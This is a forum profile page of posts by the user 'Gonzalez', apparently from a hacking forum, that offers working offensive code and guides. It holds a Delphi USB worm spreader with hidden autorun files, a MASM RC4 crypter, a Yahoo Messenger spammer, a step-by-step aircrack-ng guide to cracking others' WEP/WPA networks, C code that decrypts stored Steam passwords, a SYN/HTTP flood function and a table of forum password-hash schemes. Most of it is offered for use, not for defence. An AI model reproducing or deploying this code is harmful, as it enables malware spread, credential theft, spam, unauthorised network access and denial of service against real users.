Gonzalez
-
Posts
1577 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Gonzalez
-
Credits: No idea who created this list.. List of algorithms in forumnyh : ------------------------------------------------------------------------------------ | Title | Hash Algorithm | Prefix | Table | ------------------------------------------------------------------------------------ | Beehive | md5($pass) | | USER | | Intellect Board | md5($pass) | | User | | IPB 1.x.x | md5($pass) | ibf_ | members | | IPB 2.x.x | md5(md5($salt).md5($pass)) | ibf_ | members_converge | | ITA Forum | md5($pass) | itaf_ | user | | MercuryBoard | md5($pass) | mb_ | users | | MiniBB | md5($pass) | minibbtable_ | users | | myBB 1.2.x | md5(md5($salt).md5($pass)) | mybb_ | users | | phpBB | md5($pass) | phpbb_ | users | | phpBB > 3.0.0 RC5 | md5(phpbb3) | phpbb_ | users | | PhpMyForum | md5($pass) | pmf_ | user | | PunBB 1.2.x | SHA-1 | ??? | users | | SMF 1.0.x | md5(HMAC) | smf_ | members | | SMF 1.1.x | sha1($username.$pass) | smf_ | members | | Snitz forums 2000 | SHA-256 | FORUM_ | MEMBERS | | QuickSilver Forum | md5($pass) | qsf_ | users | | UseBB | md5($pass) | usebb_ | members | | Vanilla | md5($pass) | LUM_ | User | | VBulletin | md5(md5($pass).$salt) | | user | | VikingBoard | md5($pass) | vboard_ | member | | W-Agora | md5($pass) | | users | | WWWThreads | DES(unix) | w3t_ | users | | XMB Forum | md5($pass) | ??? | members | | YaBB | md5(HMAC) | yabbse_ | members | ------------------------------------------------------------------------------------ List of algorithms used in CMS, online shops, etc. ------------------------------------------------------------------------------------ | Title | Hash Algorithm | Prefix | Table | ------------------------------------------------------------------------------------ | AboCMS | md5($pass) | ??? | users | | DaneoCMS | md5($pass) | dn[ ]_ | users | | DataLife Engine | md5(md5($pass)) | dle_ | users | | e107 | md5(md5($pass)) | e107_ | user | | Joomla | md5($pass) | jos_ | users | | Joomla >=1.0.13 | md5($pass.$salt) | jos_ | users | | Koobi CMS | md5($pass) | koobi_ | user | | Koobi CMS >= 6 | md5(md5($pass)) | koobi_ | user | | osCommerce | md5($salt.$pass) | ??? | ?ustomers | | PHP-Nuke | md5($pass) | nuke_ | authors | | RunCMS | sha1($username.$pass) | runcms_ | users | | Slaed CMS | md5($pass) | slaed_ | users | | Wordpress | md5($pass) | wp_ | users | | Wordpress >= 2.5 | md5(phpbb3) | wp_ | users | | XOOPS | md5($pass) | xoops_ | users | ------------------------------------------------------------------------------------
-
Inca mai functioneaza, desi e vechi. function InfectUsbDrives(Exe******string):integer; var Drive: Char; myFile: TextFile; begin Result := 0; for Drive := 'A' to 'Z' do begin if (GetDriveType(PChar(Drive + ':\'))= DRIVE_REMOVABLE) then begin try if(FileExists(Drive)=True)and(FileExists(Drive+':\'+ExeName)=False)then begin CopyFile(PChar(ParamStr(0)),PChar(Drive+':\'+ExeName),False); AssignFile(myFile, Drive+':\autorun.inf'); if not FileExists(Drive+':\autorun.inf') then ReWrite(myFile) else Append(myFile); WriteLn(myFile,'[autorun]'+#13#10+'open='+ExeName); CloseFile(myFile); SetFileAttributes(PChar(Drive+':\'+ExeName), FILE_ATTRIBUTE_HIDDEN); SetFileAttributes(PChar(Drive+':\autorun.inf'), FILE_ATTRIBUTE_HIDDEN); Result := Result + 1; end; except end; end; end; end;
-
.386p .model flat, stdcall option casemap:none ; Case sensitive include \Masm32\include\windows.inc include \Masm32\include\kernel32.inc include \Masm32\include\user32.inc includelib \Masm32\lib\kernel32.lib includelib \Masm32\lib\user32.lib EnDeCryptfile proto :DWORD EnDeCryptfile2 proto :DWORD,:DWORD Rc4_setkey proto :DWORD,:DWORD Rc4_crypt proto :DWORD, :DWORD CTEXT MACRO text:VARARG LOCAL TxtName .data TxtName BYTE text,0 .code EXITM <ADDR TxtName> ENDM .data mykey db "omgwtfjusthappenedtherethen",0 .data? data db 1024 dup(?) ; bytes read/write, can be turned up rc4keytable db 256 dup (?) HoldBuf db 256 dup(?) hFileRead dd ? SizeWritten dd ? SizeWritten2 dd ? hFileRead2 dd ? .code start: invoke EnDeCryptfile,CTEXT("RC4d.exe") ; encrypts RC4.exe ;invoke EnDeCryptfile,CTEXT("RC4d.exe"); decrypt RC4.exe ;file test 2 invoke EnDeCryptfile2,CTEXT("original.exe"),CTEXT("ENCRYPTED") invoke EnDeCryptfile2,CTEXT("ENCRYPTED"),CTEXT("DENCRYPTED.exe") invoke ExitProcess,0 ;writes encrypted/decrypted data back into same file EnDeCryptfile proc inputfile:DWORD invoke CreateFile,inputfile,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL cmp eax,INVALID_HANDLE_VALUE je @F mov hFileRead,eax .while TRUE invoke ReadFile,hFileRead,addr data,1,ADDR SizeWritten,NULL .break .if eax && SizeWritten == 0 invoke lstrlen,addr mykey invoke Rc4_setkey,addr mykey,eax invoke Rc4_crypt,addr data,1 invoke SetFilePointer,hFileRead,-1,0,FILE_CURRENT invoke WriteFile,hFileRead,addr data,1,ADDR SizeWritten2,NULL .endw invoke CloseHandle,hFileRead @@: ret EnDeCryptfile endp ;writes en/decrypted file to external file, reads and writes 1024 bytes at a time but you can read as many as you like if you change the buffer size EnDeCryptfile2 proc inputfile:DWORD,savepath:DWORD invoke CreateFile,inputfile,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL cmp eax,INVALID_HANDLE_VALUE je @F mov hFileRead,eax invoke CreateFile,savepath,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL mov hFileRead2,eax .while TRUE invoke ReadFile,hFileRead,addr data,1024,ADDR SizeWritten,NULL .break .if eax && SizeWritten == 0 invoke lstrlen,addr mykey invoke Rc4_setkey,addr mykey,eax invoke Rc4_crypt,addr data,1024 invoke WriteFile,hFileRead2,addr data,1024,ADDR SizeWritten2,NULL .endw invoke CloseHandle,hFileRead invoke CloseHandle,hFileRead2 @@: ret EnDeCryptfile2 endp Rc4_setkey proc Pass:DWORD, LenPass:DWORD pushad mov eax, 0FFFEFDFCh mov ecx, 256/4 Init_rc4keytable: mov dword ptr [rc4keytable+4*ecx-4], eax sub eax, 04040404h dec ecx jnz Init_rc4keytable xor eax, eax mov edi, Pass Key_return: xor ebx, ebx mov esi ,LenPass jmp New_key Key_loop: inc bl dec esi jz Key_return New_key: mov dl, byte ptr [rc4keytable+ecx] add al, byte ptr [edi+ebx] add al, dl mov dh, byte ptr [rc4keytable+eax] mov byte ptr [rc4keytable+ecx], dh mov byte ptr [rc4keytable+eax], dl inc cl jnz Key_loop popad ret Rc4_setkey endp Rc4_crypt proc iData:DWORD, LenData:DWORD pushad mov edi, LenData mov esi, iData test edi, edi jz Rc4_enc_exit xor eax, eax xor edx, edx xor ecx, ecx xor ebx, ebx Rc4_enc_loop: inc bl mov dl, byte ptr [rc4keytable+ebx] add al, dl mov cl, byte ptr [rc4keytable+eax] mov byte ptr [rc4keytable+ebx], cl mov byte ptr [rc4keytable+eax], dl add cl, dl mov cl, byte ptr [rc4keytable+ecx] xor byte ptr [esi], cl inc esi dec edi jnz Rc4_enc_loop xor eax, eax mov edi, offset rc4keytable mov ecx, 256/4 cld rep stosd Rc4_enc_exit: popad ret Rc4_crypt endp end start eNj0Y!
-
Parti 1-8, bafta! http://securitytube.net/Assembly-Primer-for-Hackers-(Part-1)-System-Organization-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-2)-Virtual-Memory-Organization-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-3)-GDB-Usage-Primer-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-4)-Hello-World-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-5)-Data-Types-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-6)-Moving-Data-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-7)-Working-with-Strings-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-8)-Unconditional-Branching-video.aspx -Gonzalez
-
Here's a little snippet I made a while back.. I tested on version 8.1.0 of YIM. You may want to implement delay, because as of now there is none. Info: Spams out a message to everyone in the Yahoo Messenger list of the target PC running it, provided YIM is open. It's just basic, and this is not a full spreader or anything, if you want that you will have to put work in it. I just made this one night in a few hrs for fun.. ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« ; ; Yahoo Instant Messenger Spammer.. ; Tested With YIM8.1.0.421 ; Coded in MASM ; ; author drizzle@ymail.com ; ; You should probably use timers if you really gonna use this.. ; There is no set delay.. ; ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« ; ; ; ; ; ; ; ; ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« .486 ; create 32 bit code .model flat, stdcall ; 32 bit memory model option casemap :none ; case sensitive include \masm32\include\windows.inc include \masm32\include\masm32.inc include \masm32\include\gdi32.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\Comctl32.inc include \masm32\include\comdlg32.inc include \masm32\include\shell32.inc include \masm32\include\oleaut32.inc include \masm32\include\msvcrt.inc includelib \masm32\lib\masm32.lib includelib \masm32\lib\gdi32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\Comctl32.lib includelib \masm32\lib\comdlg32.lib includelib \masm32\lib\shell32.lib includelib \masm32\lib\oleaut32.lib includelib \masm32\lib\msvcrt.lib YBuddy PROTO YBuddyATL PROTO YBuddyList PROTO YBuddyCount PROTO YBuddySpam PROTO KPress PROTO :DWORD KPress2 PROTO :DWORD SendYM PROTO ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« ; ; write your code here ; ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« .code ;Message to .. SPAM! szSpamMessage db "spaaaaaaam ...",0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 szYTopWindow db "YTopWindow",0 szYTabListManager db "YTabListManager",0 szATL db "ATL:0084FD68",0 szSysListView32 db "SysListView32",0 szYahooBuddyMain db "YahooBuddyMain",0 szYSearchMenuWndClass db "YSearchMenuWndClass",0 szIMClass db "IMClass",0 szYIMInputWindow db "YIMInputWindow",0 szButton db "Button",0 szYMSend db "&Send",0 ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- start: Main proc invoke YBuddySpam invoke ExitProcess,0 Main endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- YBuddy proc invoke FindWindow, addr szYahooBuddyMain,0 ret YBuddy endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- YBuddyATL proc invoke YBuddy mov ecx, eax invoke FindWindowEx,ecx, 0, addr szYTopWindow,0 mov ecx, eax invoke FindWindowEx,ecx, 0, addr szYTabListManager,0 mov ecx, eax invoke FindWindowEx,ecx, 0, addr szATL,0 ret YBuddyATL endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- YBuddyList proc invoke YBuddyATL mov ecx, eax invoke FindWindowEx,ecx, 0, addr szSysListView32,0 ;invoke FindWindow, addr szYahooBuddyMain,0 ret YBuddyList endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- YBuddyCount proc invoke YBuddyList invoke SendMessage,eax, LVM_GETITEMCOUNT, 0, 0 ret YBuddyCount endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- YBuddySpam proc LOCAL i1:DWORD, i2:DWORD, lpCount:DWORD LOCAL hBuddy:DWORD, hBuddyList:DWORD invoke YBuddyList mov hBuddyList, eax invoke YBuddy mov hBuddy, eax invoke SendMessage,eax, LVM_GETSELECTIONMARK, 0, 0 .if eax == -1 invoke KPress,VK_DOWN .else invoke YBuddyCount mov lpCount, eax mov i1, 0 .While eax != i1 invoke KPress, VK_UP add i1,1 mov eax, lpCount .endw .endif invoke ShowWindow, hBuddy, 5 invoke SetForegroundWindow,hBuddy mov i1, 1 mov eax, lpCount .While eax != i1 invoke KPress, VK_DOWN invoke KPress, VK_RETURN invoke Sleep, 20 invoke KPress, VK_RETURN ;invoke add i1,1 invoke SendYM mov eax, lpCount .endw ret YBuddySpam endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- SendYM proc LOCAL lpYahMain:DWORD, i1:DWORD, i2:DWORD,i3:DWORD invoke FindWindow,addr szYSearchMenuWndClass,0 mov lpYahMain, eax @SendNewYahMsg: ;invoke ShowWindow, lpYahMain, 0 invoke SendMessage,lpYahMain, WM_COMMAND, 32891, 0 invoke FindWindowEx,lpYahMain, 0, addr szIMClass, 0 mov i1, eax invoke FindWindowEx,i1, 0, addr szYIMInputWindow, 0 mov i3, eax invoke ShowWindow,lpYahMain,0 invoke SendMessage,i3, WM_SETTEXT, 0, addr szSpamMessage invoke ShowWindow,lpYahMain,0 invoke FindWindowEx,i1, 0, addr szButton, addr szYMSend mov i2, eax .if i2 == 0 ret .endif invoke IsWindowEnabled,i2 .While eax == 0 invoke IsWindowEnabled,i2 .endw invoke SendMessage,i2, WM_KEYDOWN, VK_SPACE, 0 invoke SendMessage,i2, WM_KEYUP, VK_SPACE, 0 invoke ShowWindow,lpYahMain,0 invoke SendMessage,lpYahMain,WM_CLOSE,0,0 invoke FindWindow,addr szYSearchMenuWndClass,0 mov lpYahMain, eax .if eax > 0 ;jmp @SendNewYahMsg .endif ret SendYM endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- KPress proc lpKey:DWORD invoke YBuddyList push eax invoke SendMessage,eax, WM_KEYDOWN, lpKey, 0 pop eax invoke SendMessage,eax, WM_KEYUP, lpKey, 0 ret KPress endp KPress2 proc lpKey:DWORD invoke keybd_event,lpKey, 0, 0, 0 invoke keybd_event,lpKey, 0, KEYEVENTF_KEYUP, 0 ret KPress2 endp ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- include yah.asm ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- end start
-
Imi place idea. Interesanta descoperire. Mersi tinere. -Gonzalez
-
Interesant si usor de inteles, felicitari cla1992 pentru tutorial. -Gonzalez
-
Author ti.teg.tnod.I Note: This tutorial contains little fail safes - if you run into a problem you can try to post but Google is probably the best option This is a simple guide on hacking wireless routers with WPA/WEP security using aircrack-ng on Linux by ti.teg.tnod.I. Everything in this guide may work on Windows but is untested... Whenever I refer to a device/SSID/etc please just fill it in with the information YOU have gathered. WEP: Okay the first thing you should do (Unless you already know your wireless device's name) is run "iwconfig" to get the name of your wireless device. You should see something like this show up: lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:"dlink" Mode:Managed Frequency:2.437 GHz Access Point: 00:1E:58:02:00:40 Bit Rate=54 Mb/s Tx-Power=27 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Power Management:off Link Quality=63/100 Signal level:-48 dBm Noise level=-68 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 pan0 no wireless extensions. (All commands from here on will need root access) In this case the wireless device is "wlan0". So the next thing you need to do is put that device into "monitor mode". This mode should allow you to observe what's going on around you. You can do this by running: airmon-ng start wlan0 Which should return something similar to: Interface Chipset Driver wlan0 Broadcom 43xx b43 - [phy0] (monitor mode enabled on mon0) What we want to know is "mon0" which is the device we will use. Now we want to know what's going on around us...In order to do that we need to run: airodump-ng mon0 This should display a window that's pretty self explanatory it should look like this: CH 2 ][ Elapsed: 44 s ][ 2009-03-19 20:21 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink BSSID STATION PWR Rate Lost Packets Probes 00:1E:58:02:00:40 00:16:CF:1A:54:88 0 1- 0 0 56 dlink (not associated) 00:1F:3B:22:09:E3 196 0- 1 8 9 dlink Now see " 00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink "? The 46 is the amount of IVs obtained (Used for cracking the password), the 0 is the amount of IVs obtained a second, the WPA2 is the type of security used (You need this to be WEP for this tutorial), and "00:1E:58:02:00:40" is the router's BSSID. The clients are listed in the lower section. Now you should note the channel the router is connected to (In this case it's 6). After you have done that you should terminate airodump-ng to free resources, closing the terminal won't do anything so run something like "killall airodump-ng" (Needs root). Okay after you've terminated the previous airodump-ng run: airodump-ng -c 6 --bssid 00:13:A3:0B:98:83 -w dump mon0 This is pretty self explanatory in my opinion, the "6" is the channel, the "00:13:A3:0B:98:83" is the BSSID of the router, "dump" is the prefix of the dump file (You'd be fine not touching that), and mon0 is the device. Now you should see a screen similar to the previous screen just maybe with less clutter. Now airodump-ng is only looking for connections from that channel and router and logging all the IVs to a file. You probably want to wait until the amount of "data" you've collected reaches 30 000 - 80 000 before trying to crack the password. If it's going slowly (0-1 IVs a second) try deauthenticating the client for IVs...There may be a better way than doing this but this method is the best method I know of that works. To deauthenticate a client first get their MAC address (Located under "STATION") and then run: aireplay-ng -0 70 -a 00:13:A3:0B:98:83 -c 00:1A:73:FA:1C:12 mon0 Okay the -0 means deauthentication, the 70 is how many deauths to send (You probably want 50-100, don't set a large number such as 1024 as the client may stop replying IVs for a bit.), "00:13:A3:0B:98:83" is the BSSID of the access point, "00:1A:73:FA:1C:12" is the MAC address of the client you're deauthing, and mon0 is the device. You shouldn't run this if you're already getting an alright amount of IVs (More than 0 a second) though as it could slow down the process. You may run this as many times as needed. Now finally if you think you have enough IVs (If you don't you can always repeat this step) you can make an attempt at the password: aircrack-ng -b 00:13:A3:0B:98:83 dump-01.cap Okay "00:13:A3:0B:98:83" is the BSSID of the router and "dump-01.cap" is the file where the IVs are located, alternatively you may run something like: aircrack-ng -b 00:13:A3:0B:98:83 dump*.cap That will include all the IV files with the prefix "dump" if you've separated them. If aircrack-ng seems to hang and doesn't fix itself within 45-60 seconds then feel free to terminate it and try again after another 5000-10 000 IVs. I hope this guide is clear...Any questions or comments feel free to post or PM me. I will do the WPA summary later but this is a quick breakdown (Which is just a list of commands really) sudo airmon-ng start wlan0 #Get the MAC address of your access point (00:1E:58:02:00:40) #Channel 6 (2.437GHz) sudo airodump-ng -c 6 --bssid 00:1E:58:02:00:40 -w psk mon0 #Optional: # -0 means deauthentication # 1 is the number of deauths to send (you can send multiple if you wish) # -a 00:14:6C:7E:40:80 is the MAC address of the access point # -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing sudo aireplay-ng -0 1 -a 00:1E:58:02:00:40 -c 00:1A:73:FA:1C:12 mon0 sudo aircrack-ng -w dictionary_english.dic -b 00:1E:58:02:00:40 psk*.cap
-
#include <windows.h> #include <cstdio> #include <iostream> using namespace std; bool IsAdmin() { UINT i; bool bRetval = FALSE; BOOL bSuccess; HANDLE hAccessToken; UCHAR InfoBuffer[1024]; PTOKEN_GROUPS ptgGroups = (PTOKEN_GROUPS) InfoBuffer; DWORD dwInfoBufferSize; PSID psidAdministrators; SID_IDENTIFIER_AUTHORITY siaNtAuthority = SECURITY_NT_AUTHORITY; OSVERSIONINFO Info = {0}; Info.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if (GetVersionEx(&Info)) { if ((Info.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)&& (Info.dwMajorVersion==4)) return TRUE; } else return FALSE; if (!OpenThreadToken(GetCurrentThread(),TOKEN_QUERY,TRUE,&hAccessToken)) { if (GetLastError() != ERROR_NO_TOKEN) return FALSE; if (!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&hAccessToken)) return FALSE; } bSuccess = GetTokenInformation(hAccessToken,TokenGroups,InfoBuffer, sizeof(InfoBuffer),&dwInfoBufferSize); CloseHandle(hAccessToken); if (!bSuccess) return FALSE; if (!AllocateAndInitializeSid(&siaNtAuthority,2,SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,0,0,0,0,0,0,&psidAdministrators)) return FALSE; for (i = 0; i < ptgGroups->GroupCount; i++) { if (EqualSid(psidAdministrators,ptgGroups->Groups[i].Sid)) { bRetval = TRUE; break; } } FreeSid(psidAdministrators); return bRetval; return 0; } int main() { if(IsAdmin()) { cout << "You are an admin" << endl; } else { cout << "You are NOT an admin" << endl; } return 0; }
-
// // DecryptStoredSteamPassword.c // // Combines Luigi's ClientRegistry.blob parsing function(s) // with VALVe's exported SteamDecryptDataForThisMachine() function // // small code changes and comments added by desxor // again some changes and fuctions were added by Five-Three-Nine #include <stdio.h> #include <stdint.h> #include <string.h> #include <sys/stat.h> #include <windows.h> void GetSteamDic(char *Path); void SteamParseEncryptedPassPhrase(uint8_t *fname); uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str); typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e); SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine; int main(int argc, char *argv[]) { HANDLE hSteamDLL; /* Find Steam Dir */ char SteamPath[100] = {}; char SteamDll[100] = {}; char SteamBlob[100] = {}; char SteamUser[100] = {}; GetSteamDic(SteamPath); strcat(SteamDll,SteamPath); strcat(SteamDll,"\\Steam.dll"); strcat(SteamBlob,SteamPath); strcat(SteamBlob,"\\ClientRegistry.blob"); strcat(SteamUser,SteamPath); strcat(SteamUser,"\\SteamApps\\*"); printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser); hSteamDLL = LoadLibrary(SteamDll); if(!hSteamDLL) { printf("\nError: the file STEAM.DLL has not been found.\n"); exit(1); } SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine"); if(!SteamDecryptDataForThisMachine) { printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n"); exit(1); } SteamParseEncryptedPassPhrase(SteamBlob); FreeLibrary(hSteamDLL); /* Addon: Find Steam Users */ printf("\nSteam User Names:\n"); HANDLE fHandle; WIN32_FIND_DATA wfd; fHandle=FindFirstFile(SteamUser,&wfd); do { if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) )) { if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0)) { printf("%s\n",wfd.cFileName); } } } } while (FindNextFile(fHandle,&wfd)); FindClose(fHandle); return(0); } void SteamParseEncryptedPassPhrase(uint8_t *fname) { int len, fdsize, pwds; uint16_t nlen; uint8_t *fdbuff, *fdnext, *p, *buff; char decpass[100]; struct stat xstat; FILE *fd; fd = fopen(fname, "rb"); if(!fd) { printf("Could not open %s for reading/memory search.\n", fname); exit(1); } else { fstat(fileno(fd), &xstat); fdbuff = malloc(xstat.st_size); if(!fdbuff) { printf("Could not allocate file into memory.\n"); // comments for the following are pretty much the same as below so look there for // a more detailed description of what's going on len = strlen(fname); fdsize = 64 + len; fdbuff = malloc(fdsize); p = fdbuff; p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50"); *(uint16_t *)p = 0; p += 2; *(uint32_t *)p = len; p += 4 + 0; strcpy(p, fname); fclose(fd); goto next; } // load our file into memory for searching and reading its data fread(fdbuff, 1, xstat.st_size, fd); fclose(fd); fdsize = xstat.st_size; } next: fdnext = fdbuff; for(pwds = 0;; pwds++) { // search for unique phrase text using memcmp(), using a great little function provided by Luigi A. // his function will search the entire allocated memory for the data you specify and return with it // if its found, otherwise null p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50"); if(!p) { if(pwds) break; printf("An encrypted and stored password could not be located, exiting.\n"); exit(1); } // skip 30 bytes past the PHRASE text to the encrypted password until we come // to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining p += 30; // this is the 16 bit number we are looking for, save it in the following format: // num = byte1 + (byte2 * 256) nlen = *(uint16_t *)p; // skip the next 2 bytes of the 16bit number we just saved p += 2; // after we skipped 2 bytes, we come to 32bit number (4 bytes) which should always be the // size of our encrypted string, it should appear as "5c 00 00 00", which equals 0x5c or simply, 92 // save this in the same format as before len = *(uint32_t *)p; // now we skip the 4 bytes that we _just read_ PLUS the amount of bytes specified by the first // 16 bit number we just saved, should be 2 bytes anyhow // this should now bring us to our encrypted password located in ClientRegistry.blob which should be // 92 (0x5c) characters long p += 4 + nlen; // an example of the data, provided by Luigi: // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~....... // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................ // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96 // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12 // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369 // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708 // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363 // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc fdsize -= (p - fdnext); fdnext = p; // as long as our length is greater than zero but no bigger than fdsize, execute the exported decryption function if((len > 0) && (len < fdsize)) { // null terminate the end of our string, otherwise it will cause problems p[len] = 0; printf("Found stored encrypted password:\n \"%s\"\n\n", p); if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) { printf("Password: %.*s\n\n", len, decpass); } else { printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n"); } } } free(fdbuff); } uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str) { int strsz; uint8_t *limit; strsz = strlen(str); limit = buff + buffsz - strsz; for(; buff <= limit; buff++) { if(!memcmp(buff, str, strsz)) return(buff); } return(NULL); } void GetSteamDic(char *Path) { HKEY hKey; DWORD size; RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey); RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size); RegCloseKey(hKey); }
-
void skysynhttp(char *target, char *port, int len) { SOCKADDR_IN SockAddr; SOCKET sock[500]; IN_ADDR iaddr; unsigned long szip; int c,i; char packet[1028]; int sockdelay = 100; int skysocket = 500; hostent *szhostent = gethostbyname(target); if (szhostent == NULL) return; szip = *((unsigned long *)szhostent->h_addr_list[0]); memset(&SockAddr, 0, sizeof(SockAddr)); SockAddr.sin_family = AF_INET; SockAddr.sin_port = htons(atoi(port)); DWORD mode = 1; iaddr.s_addr = szip; SockAddr.sin_addr = iaddr; i = 0; sprintf(packet, "GET / HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nHost: %s\r\nConnection: Keep-Alive\r\n", target); while (i < len) { for (c=0;c<skysocket;c++) { sock[c] = socket(AF_INET, SOCK_STREAM, 0); if (sock[c] == INVALID_SOCKET) continue; ioctlsocket(sock[c],FIONBIO,&mode); } for (c=0;c<skysocket;c++) connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr)); for (c=0;c<skysocket;c++) //lets send get request lolz. send(sock[c], packet, strlen(packet), 0); Sleep(sockdelay); for (c=0;c<skysocket;c++) closesocket(sock[c]); i++; } return; }
-
